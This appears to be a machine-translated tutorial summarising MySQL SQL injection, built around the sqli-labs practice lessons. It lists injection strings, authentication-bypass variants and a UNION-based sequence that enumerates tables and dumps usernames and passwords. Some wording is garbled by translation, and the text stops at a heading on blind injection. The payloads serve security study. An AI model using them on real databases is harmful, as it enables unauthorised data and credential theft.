Simple sql injection summary (a)
0x01
(1) injected Category: eyes of the beholder wise see wisdom, not narrated herein.
(2) system functions:
Several commonly used functions:
- version () - system version;
- database () - database name;
- user () - database user name;
- @@ datadir-- database path;
- @@ vision_compile_os-- operating system version;
(3) string concatenation function
- concat (str1, str2, ...) - no delimiter strings are connected;
- concat_ws ( 'separator', str1, str2, ...) - connected string containing the delimiter
- group_concat (str1, str2, ...) - Connections group all strings, separated by commas and
do not need a detailed understanding of what these three functions can be disposable find out all the content on the line.
(4) is generally used to try statement
or 1=1#
'or 1=1#
''or 1=1#
)or 1=1#
')or 1=1#
‘’)or 1=1#
‘’))or 1=1#
(5) the Notes
- - + #, / ** / etc.
to sum up
In fact, nothing more than a sql injection is divided into two parts, one closed Mysql statements; the second is the implementation of a new sentence constructed.
0x02 variety of injection methods and processes
(1) General injection sqllibs (Less1-4)
#注入点
-1' union select 1,2,3--+
#爆数据库
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表
-1' union select 1,group_concat(table_name),3 from information_schema.tables where schema_name='security'--+
#爆字段
-1‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
-1‘ union select 1,username,password from users where id=2--+
The following questions same sql statement executed will not pay more to say, just closed 'differences in the way, directly attached to it, can be successfully implanted are:
or 1=1
or 1=1 --+
') or '1'=('1'
) or 1=1 --+
“) or ”1”=(“1
“) or 1=1 --+
(2) Mekurachu
After performing the injection does not echo the front page statement called blinds.